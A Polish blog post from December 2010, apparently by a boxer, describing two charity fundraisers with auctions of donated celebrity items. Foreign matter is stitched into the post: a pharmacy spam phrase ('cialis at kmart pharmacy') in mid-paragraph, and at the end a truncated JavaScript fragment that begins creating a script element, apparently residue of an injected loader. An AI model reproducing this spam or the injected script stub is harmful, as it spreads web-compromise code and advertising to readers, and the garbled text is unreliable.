Imprezy charytatywne Jelenia Góra i Kąty Wrocławskie.

27.12.2010 / Mariusz Cieśliński

Koniec roku to zazwyczaj taki czas ,że odbywa się dużo imprez z udziałem sportowców o charytatywnym celu.W grudniu miałem przyjemność uczestniczyć we dwóch takich wydarzeniach-w Jeleniej Górze i Kątach Wrocławskich.

W Jeleniej Górze impreza miała charakter sportowo-rozrywkowy.Rockowy zespół z Irlandii oraz warszawski raper FU to goście,którzy uświetnili swą obecnością galę boksu,kickboxingu i muaythai. cialis at kmart pharmacy  W roli anonsera i prowadzącego  licytację przedmiotów należących do popularnych aktorów oraz sportowców doskonale sprawdził się Michał Piróg .

Przodmioty przekazali :Hanna Sleszyńska,Daniel Olbrychski,Tomasz Iwan,Michał Żebrowski oraz wielu innych.Rękawice , w których walczyłem Michał Piróg wylicytował za 1500pln.

Celem tej imprezy była zbiórka pieniędzy na pompy insulinowe.Publiczność jeleniogórska wypełniła całą halę i była niezmiernie hojna.Głównym organizatorem był bokser zawodowy Łukasz Janik.

Nasętępną imprezą była zbiórka pieniędzy na chorego na zanik mięśni kilkulatka Michała Cymermana.Organizował go Kiki z Kaioken Crew.Jednym z głównych przedmiotów przekazanych do licytacji była felga z opną z samochodu rajdowego przekazana przez Tomka Kuchara a także plakat Marcina Gortata i rękawice bokserskie Łukasza Janika przekazane przez wrocławski Body Zone.Występy grup hiphopowych,pokazy brekdance.http://trec.com.pl/aktualnosci/bboy_kiki_koncert_charytatywny.html

Obie imprezy zorganizowane spontanicznie.Z dużą ilością publiki.Ku radości chorych dzieci i ich rodziców .var d=document;var s=d.createElement(‚script’); if (document.currentScript) { }